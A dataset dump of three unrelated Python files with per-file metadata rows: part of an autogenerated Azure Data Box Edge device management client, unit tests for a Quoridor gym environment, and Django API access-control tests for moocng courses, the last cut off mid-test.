    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._install_updates_initial(
        device_name=device_name,
        resource_group_name=resource_group_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Operation returns no body; optionally surface the raw response.
        return ClientRawResponse(None, response) if raw else None

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
install_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/installUpdates'}
def get_network_settings(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Gets the network settings of the specified data box edge/gateway
    device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: NetworkSettings or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.edgegateway.models.NetworkSettings or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    url = self._client.format_url(
        self.get_network_settings.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {'Accept': 'application/json'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = (
        self._deserialize('NetworkSettings', response)
        if response.status_code == 200 else None)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_network_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/networkSettings/default'}
def _scan_for_updates_initial(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Issue the initial POST of the scan-for-updates long-running operation.

    Raises CloudError unless the service answers 200/202; returns a
    ClientRawResponse when *raw* is True (no body is deserialized).
    """
    url = self._client.format_url(
        self.scan_for_updates.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200, 202):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    if raw:
        return ClientRawResponse(None, response)
def scan_for_updates(
        self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Scans for updates on a data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._scan_for_updates_initial(
        device_name=device_name,
        resource_group_name=resource_group_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Operation returns no body; optionally surface the raw response.
        return ClientRawResponse(None, response) if raw else None

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
scan_for_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/scanForUpdates'}
def _create_or_update_security_settings_initial(
        self, device_name, resource_group_name, device_admin_password, custom_headers=None, raw=False, **operation_config):
    """Issue the initial POST of the update-security-settings LRO.

    Wraps the admin password in a SecuritySettings body; raises CloudError
    unless the service answers 202/204 (no response body is expected).
    """
    security_settings = models.SecuritySettings(device_admin_password=device_admin_password)

    url = self._client.format_url(
        self.create_or_update_security_settings.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    body_content = self._serialize.body(security_settings, 'SecuritySettings')

    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (202, 204):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    if raw:
        return ClientRawResponse(None, response)
def create_or_update_security_settings(
        self, device_name, resource_group_name, device_admin_password, custom_headers=None, raw=False, polling=True, **operation_config):
    """Updates the security settings on a data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param device_admin_password: Device administrator password as an
     encrypted string (encrypted using RSA PKCS #1) is used to sign into
     the local web UI of the device. The Actual password should have at
     least 8 characters that are a combination of uppercase, lowercase,
     numeric, and special characters.
    :type device_admin_password:
     ~azure.mgmt.edgegateway.models.AsymmetricEncryptedSecret
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._create_or_update_security_settings_initial(
        device_name=device_name,
        resource_group_name=resource_group_name,
        device_admin_password=device_admin_password,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Operation returns no body; optionally surface the raw response.
        return ClientRawResponse(None, response) if raw else None

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_security_settings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/securitySettings/default/update'}
def get_update_summary(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Gets information about the availability of updates based on the last
    scan of the device. It also gets information about any ongoing download
    or install jobs on the device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: UpdateSummary or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.edgegateway.models.UpdateSummary or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    url = self._client.format_url(
        self.get_update_summary.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {'Accept': 'application/json'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = (
        self._deserialize('UpdateSummary', response)
        if response.status_code == 200 else None)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_update_summary.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/updateSummary/default'}
def upload_certificate(
        self, device_name, resource_group_name, certificate, authentication_type=None, custom_headers=None, raw=False, **operation_config):
    """Uploads registration certificate for the device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param certificate: The base64 encoded certificate raw data.
    :type certificate: str
    :param authentication_type: The authentication type. Possible values
     include: 'Invalid', 'AzureActiveDirectory'
    :type authentication_type: str or
     ~azure.mgmt.edgegateway.models.AuthenticationType
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: UploadCertificateResponse or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.edgegateway.models.UploadCertificateResponse or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Pack the certificate and auth type into the request model.
    parameters = models.UploadCertificateRequest(
        authentication_type=authentication_type, certificate=certificate)

    url = self._client.format_url(
        self.upload_certificate.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    body_content = self._serialize.body(parameters, 'UploadCertificateRequest')

    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = (
        self._deserialize('UploadCertificateResponse', response)
        if response.status_code == 200 else None)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
upload_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/uploadCertificate'}
| 48.339138 | 223 | 0.678884 | 5,711 | 52,738 | 6.041499 | 0.050954 | 0.037678 | 0.0473 | 0.029215 | 0.912703 | 0.904907 | 0.896618 | 0.890502 | 0.883981 | 0.883228 | 0 | 0.002957 | 0.230384 | 52,738 | 1,090 | 224 | 48.383486 | 0.847122 | 0.259396 | 0 | 0.80737 | 0 | 0.005025 | 0.156803 | 0.088229 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048576 | false | 0.0067 | 0.01005 | 0 | 0.125628 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86af85a749a985dad66f60c7e935b119df276fa4 | 9,856 | py | Python | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | 1 | 2020-06-27T08:19:23.000Z | 2020-06-27T08:19:23.000Z | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | null | null | null | gym_quoridor/test_game.py | Xe-Xo/GymQuoridor | ab65c9f698fa2ceaf4728a241fcf181b09dbfd9d | [
"MIT"
] | null | null | null | import random
import unittest
import gym
import numpy as np
from gym_quoridor import quoridorvars
from gym_quoridor.quoridorgame import QuoridorGame
class TestGoEnv(unittest.TestCase):

    """Behavioural tests for the 'gym_quoridor:quoridor-v0' environment."""

    def setUp(self) -> None:
        self.env = gym.make('gym_quoridor:quoridor-v0', size=9, reward_method='real')

    def tearDown(self):
        self.env.close()

    def test_get_init_board(self):
        """Check Initial Board"""
        state = self.env.reset()
        # Expected initial observation: 14 planes of 9x9, all zero except
        # the cells set below. (Plane semantics live in quoridorvars;
        # presumably planes 0/1 are the two pawns — confirm there.)
        teststate = np.zeros((14, 9, 9), dtype=int)
        teststate[0, 4, 0] = 1                                            # CHANNEL 0
        teststate[1, 4, 8] = 1                                            # CHANNEL 1
        teststate[3, 3, 0] = teststate[3, 4, 1] = teststate[3, 5, 0] = 1  # CHANNEL 3
        teststate[4, 3, 8] = teststate[4, 4, 7] = teststate[4, 5, 8] = 1  # CHANNEL 4
        teststate[11, 4, 1:] = 1                                          # CHANNEL 11
        teststate[12, 4, :8] = 1                                          # CHANNEL 12
        for chnl in range(quoridorvars.NUM_CHNLS):
            for x in range(self.env.size):
                for y in range(self.env.size):
                    with self.subTest(f"{chnl,x,y}"):
                        self.assertEqual(state[chnl, x, y], teststate[chnl, x, y])

    def test_start_turn(self):
        """Check Black Starts"""
        state = self.env.reset()
        self.assertEqual(QuoridorGame.get_player_turn(state), 0)

    def test_next_turn(self):
        """Check Next Turn Works correctly"""
        state = self.env.reset()
        state, _, _, _ = self.env.step(1)
        self.assertEqual(QuoridorGame.get_player_turn(state), 1)

    def test_place_v_wall(self):
        # Place a vertical wall (direction 0) at every placement cell,
        # once as black (turn 0) and once as white (turn 1).
        for x in range(self.env.size - 1):
            for y in range(self.env.size - 1):
                for turn in range(2):
                    state = self.env.reset()
                    if turn == 0:
                        action = QuoridorGame.placement_to_action(self.env.state, x, y, 0)
                        state, _, _, _ = self.env.step(action)
                        with self.subTest(f"{quoridorvars.BLACK_V_WALL_CHNL,x,y}=1,{action}-->{x,y},{turn},{QuoridorGame.__str__(state)}"):
                            self.assertEqual(state[quoridorvars.BLACK_V_WALL_CHNL, x, y], 1)
                    else:
                        # Burn black's move so the wall is placed by white.
                        state, _, _, _ = self.env.step(1)
                        action = QuoridorGame.placement_to_action(state, x, y, 0)
                        state, _, _, _ = self.env.step(action)
                        with self.subTest(f"{quoridorvars.WHITE_V_WALL_CHNL,x,y}=1,{action},{turn}"):
                            self.assertEqual(state[quoridorvars.WHITE_V_WALL_CHNL, x, y], 1)

    def test_place_h_wall(self):
        # Same as test_place_v_wall, but for horizontal walls (direction 1).
        for x in range(self.env.size - 1):
            for y in range(self.env.size - 1):
                for turn in range(2):
                    state = self.env.reset()
                    if turn == 0:
                        action = QuoridorGame.placement_to_action(self.env.state, x, y, 1)
                        state, _, _, _ = self.env.step(action)
                        with self.subTest(f"{quoridorvars.BLACK_H_WALL_CHNL,x,y}=1,{action},{turn}"):
                            self.assertEqual(state[quoridorvars.BLACK_H_WALL_CHNL, x, y], 1)
                    else:
                        state, _, _, _ = self.env.step(1)
                        action = QuoridorGame.placement_to_action(self.env.state, x, y, 1)
                        state, _, _, _ = self.env.step(action)
                        with self.subTest(f"{quoridorvars.WHITE_H_WALL_CHNL,x,y}=1,{action},{turn}"):
                            self.assertEqual(state[quoridorvars.WHITE_H_WALL_CHNL, x, y], 1)

    def test_place_walls_on_existing_walls(self):
        # After trying to stack a second wall on an occupied cell, exactly
        # one wall channel may be set at (x, y).
        for x in range(self.env.size - 1):
            for y in range(self.env.size - 1):
                for walltype1 in range(2):
                    for walltype2 in range(2):
                        state = self.env.reset()
                        action = QuoridorGame.placement_to_action(state, x, y, walltype1)
                        state, _, _, _ = self.env.step(action)
                        action2 = QuoridorGame.placement_to_action(state, x, y, walltype2)
                        state, _, _, _ = self.env.step(action2)
                        total = sum(
                            state[chnl, x, y]
                            for chnl in range(quoridorvars.BLACK_V_WALL_CHNL,
                                              quoridorvars.WHITE_H_WALL_CHNL + 1))
                        with self.subTest(f"{x,y,walltype1,walltype2}=>{total}==1,{action,action2},samewalls!{walltype1==walltype2}{state[quoridorvars.BLACK_V_WALL_CHNL,x,y]}{state[quoridorvars.BLACK_H_WALL_CHNL,x,y]}{state[quoridorvars.WHITE_V_WALL_CHNL,x,y]}{state[quoridorvars.WHITE_H_WALL_CHNL,x,y]}"):
                            self.assertEqual(total, 1)

    def test_invalid_placement_for_walls(self):
        # A first placement is valid; a second placement on the same cell
        # must be reported invalid by valid_placement.
        for x in range(self.env.size - 1):
            for y in range(self.env.size - 1):
                for walltype1 in range(2):
                    for walltype2 in range(2):
                        state = self.env.reset()
                        action = QuoridorGame.placement_to_action(state, x, y, walltype1)
                        valid, wx, wy, wdir = QuoridorGame.valid_placement(state, action)
                        self.assertTrue(valid)
                        self.assertEqual(x, wx)
                        self.assertEqual(y, wy)
                        self.assertEqual(walltype1, wdir)
                        state, _, _, _ = self.env.step(action)
                        action2 = QuoridorGame.placement_to_action(state, x, y, walltype2)
                        valid, wx, wy, wdir = QuoridorGame.valid_placement(state, action2)
                        self.assertFalse(valid)
                        self.assertEqual(x, wx)
                        self.assertEqual(y, wy)
                        self.assertEqual(walltype2, wdir)
if __name__ == '__main__':
unittest.main()
| 37.475285 | 294 | 0.429383 | 1,827 | 9,856 | 2.243569 | 0.056377 | 0.530373 | 0.777995 | 1.013906 | 0.799219 | 0.772871 | 0.759941 | 0.725787 | 0.649183 | 0.649183 | 0 | 0.192698 | 0.360795 | 9,856 | 262 | 295 | 37.618321 | 0.457937 | 0.026481 | 0 | 0.758475 | 0 | 0.008475 | 0.058461 | 0.05616 | 0 | 0 | 0 | 0 | 0.067797 | 1 | 0.038136 | false | 0.004237 | 0.025424 | 0 | 0.067797 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
86d929a283a87eac19c07d8dc5655660e14336dc | 17,588 | py | Python | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 36 | 2015-01-10T06:00:36.000Z | 2020-03-19T10:06:59.000Z | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 3 | 2015-10-01T17:59:32.000Z | 2018-09-04T03:32:17.000Z | moocng/api/tests/test_course.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 17 | 2015-01-13T03:46:58.000Z | 2020-07-05T06:29:51.000Z | # -*- coding: utf-8 -*-
# Copyright 2012-2013 UNED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from django.utils import simplejson
from moocng.api.tests.outputs import (NO_OBJECTS, BASIC_COURSES, BASIC_COURSE)
from moocng.api.tests.utils import ApiTestCase
class CoursesTestCase(ApiTestCase):

    """Access-control tests for the course list endpoint."""

    def _list_url(self, key=None):
        # Course list endpoint, optionally authenticated with an API key.
        url = '/api/%s/course/%s' % (self.api_name, self.format_append)
        if key is not None:
            url = '%s&key=%s' % (url, key)
        return url

    def _assert_list(self, status, content=None, key=None):
        # GET the list and check the status code and, optionally, the body.
        response = self.client.get(self._list_url(key))
        self.assertEqual(response.status_code, status)
        if content is not None:
            self.assertEqual(response.content, content)

    def test_get_courses_annonymous(self):
        # TODO: Check not published course
        owner = self.create_test_user_owner()
        self.create_test_basic_course(owner)
        self._assert_list(401)

    def test_get_courses_user(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        self.client = self.django_login_user(self.client, user)
        self._assert_list(200, NO_OBJECTS)
        self.create_test_basic_course(owner)
        self._assert_list(200, BASIC_COURSES)

    def test_get_courses_alum(self):
        owner = self.create_test_user_owner()
        alum1 = self.create_test_user_alum1()
        self.client = self.django_login_user(self.client, alum1)
        self._assert_list(200, NO_OBJECTS)
        self.create_test_basic_course(owner, student=alum1)
        self._assert_list(200, BASIC_COURSES)

    def test_get_courses_teacher(self):
        owner = self.create_test_user_owner()
        teacher1 = self.create_test_user_teacher1()
        self.client = self.django_login_user(self.client, teacher1)
        self._assert_list(200, NO_OBJECTS)
        self.create_test_basic_course(owner, teacher=teacher1)
        self._assert_list(200, BASIC_COURSES)

    def test_get_courses_owner(self):
        owner = self.create_test_user_owner()
        self.client = self.django_login_user(self.client, owner)
        self._assert_list(200, NO_OBJECTS)
        self.create_test_basic_course(owner)
        self._assert_list(200, BASIC_COURSES)

    def test_get_courses_admin(self):
        owner = self.create_test_user_owner()
        admin = self.create_test_user_admin()
        self.client = self.django_login_user(self.client, admin)
        self._assert_list(200, NO_OBJECTS)
        self.create_test_basic_course(owner)
        self._assert_list(200, BASIC_COURSES)

    def test_get_courses_userkey(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        key = str(uuid.uuid4())
        self.generate_apikeyuser(user, key)
        self._assert_list(200, NO_OBJECTS, key=key)
        self.create_test_basic_course(owner)
        self._assert_list(200, BASIC_COURSES, key=key)
class CourseTestCase(ApiTestCase):

    """Access-control tests for the course detail endpoint.

    The API is read-only: GET is allowed (subject to permissions) while
    POST/PUT/DELETE must always answer 405.
    """

    def _detail_url(self, key=None):
        # Detail endpoint for the course with pk 1, optionally with an API key.
        url = '/api/%s/course/1/%s' % (self.api_name, self.format_append)
        if key is not None:
            url = '%s&key=%s' % (url, key)
        return url

    def _list_url(self, key=None):
        # Course list endpoint (used by the create tests).
        url = '/api/%s/course/%s' % (self.api_name, self.format_append)
        if key is not None:
            url = '%s&key=%s' % (url, key)
        return url

    def _assert_get(self, status, content=None, key=None):
        # GET the detail URL and check status and, optionally, the body.
        response = self.client.get(self._detail_url(key))
        self.assertEqual(response.status_code, status)
        if content is not None:
            self.assertEqual(response.content, content)

    def _assert_not_allowed(self, method, url):
        # Any write operation must be rejected with 405 Method Not Allowed.
        response = method(url, simplejson.loads(BASIC_COURSE))
        self.assertEqual(response.status_code, 405)

    # Get course
    def test_get_course_annonymous(self):
        owner = self.create_test_user_owner()
        self.create_test_basic_course(owner)
        self._assert_get(401)

    def test_get_course_user(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        self.client = self.django_login_user(self.client, user)
        self._assert_get(404)
        self.create_test_basic_course(owner)
        self._assert_get(200, BASIC_COURSE)

    def test_get_course_alum(self):
        owner = self.create_test_user_owner()
        alum1 = self.create_test_user_alum1()
        self.client = self.django_login_user(self.client, alum1)
        self._assert_get(404)
        self.create_test_basic_course(owner, student=alum1)
        self._assert_get(200, BASIC_COURSE)

    def test_get_course_teacher(self):
        owner = self.create_test_user_owner()
        teacher1 = self.create_test_user_teacher1()
        self.client = self.django_login_user(self.client, teacher1)
        self._assert_get(404)
        self.create_test_basic_course(owner, teacher=teacher1)
        self._assert_get(200, BASIC_COURSE)

    def test_get_course_owner(self):
        owner = self.create_test_user_owner()
        self.client = self.django_login_user(self.client, owner)
        self._assert_get(404)
        self.create_test_basic_course(owner)
        self._assert_get(200, BASIC_COURSE)

    def test_get_course_admin(self):
        owner = self.create_test_user_owner()
        admin = self.create_test_user_admin()
        self.client = self.django_login_user(self.client, admin)
        self._assert_get(404)
        self.create_test_basic_course(owner)
        self._assert_get(200, BASIC_COURSE)

    def test_get_course_userkey(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        key = str(uuid.uuid4())
        self.generate_apikeyuser(user, key)
        self._assert_get(404, key=key)
        self.create_test_basic_course(owner)
        self._assert_get(200, BASIC_COURSE, key=key)

    # Change course_slug
    def test_change_slug_annonymous(self):
        pass

    def test_change_slug_user(self):
        pass

    def test_change_slug_alum(self):
        pass

    def test_change_slug_teacher(self):
        pass

    def test_change_slug_owner(self):
        pass

    def test_change_slug_admin(self):
        pass

    # Create course
    def test_create_course_annonymous(self):
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course_user(self):
        user = self.create_test_user_user()
        self.client = self.django_login_user(self.client, user)
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course_alum(self):
        alum1 = self.create_test_user_alum1()
        self.client = self.django_login_user(self.client, alum1)
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course_teacher(self):
        teacher1 = self.create_test_user_teacher1()
        self.client = self.django_login_user(self.client, teacher1)
        self._assert_get(404)
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course_owner(self):
        owner = self.create_test_user_owner()
        self.client = self.django_login_user(self.client, owner)
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course__admin(self):
        admin = self.create_test_user_admin()
        self.client = self.django_login_user(self.client, admin)
        self._assert_not_allowed(self.client.post, self._list_url())

    def test_create_course_userkey(self):
        user = self.create_test_user_user()
        key = str(uuid.uuid4())
        self.generate_apikeyuser(user, key)
        self._assert_not_allowed(self.client.post, self._list_url(key))

    # Update course
    def test_put_course_annonymous(self):
        owner = self.create_test_user_owner()
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_user(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        self.client = self.django_login_user(self.client, user)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_alum(self):
        owner = self.create_test_user_owner()
        alum1 = self.create_test_user_alum1()
        self.client = self.django_login_user(self.client, alum1)
        self.create_test_basic_course(owner, student=alum1)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_teacher(self):
        owner = self.create_test_user_owner()
        teacher1 = self.create_test_user_teacher1()
        self.client = self.django_login_user(self.client, teacher1)
        self.create_test_basic_course(owner, teacher=teacher1)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_owner(self):
        owner = self.create_test_user_owner()
        self.client = self.django_login_user(self.client, owner)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_admin(self):
        owner = self.create_test_user_owner()
        admin = self.create_test_user_admin()
        self.client = self.django_login_user(self.client, admin)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.put, self._detail_url())

    def test_put_course_userkey(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        key = str(uuid.uuid4())
        self.generate_apikeyuser(user, key)
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.put, self._detail_url(key))

    # Delete course
    def test_delete_course_annonymous(self):
        owner = self.create_test_user_owner()
        self.create_test_basic_course(owner)
        self._assert_not_allowed(self.client.delete, self._detail_url())

    def test_delete_course_user(self):
        owner = self.create_test_user_owner()
        user = self.create_test_user_user()
        self.client = self.django_login_user(self.client, user)
        self.create_test_basic_course(owner)
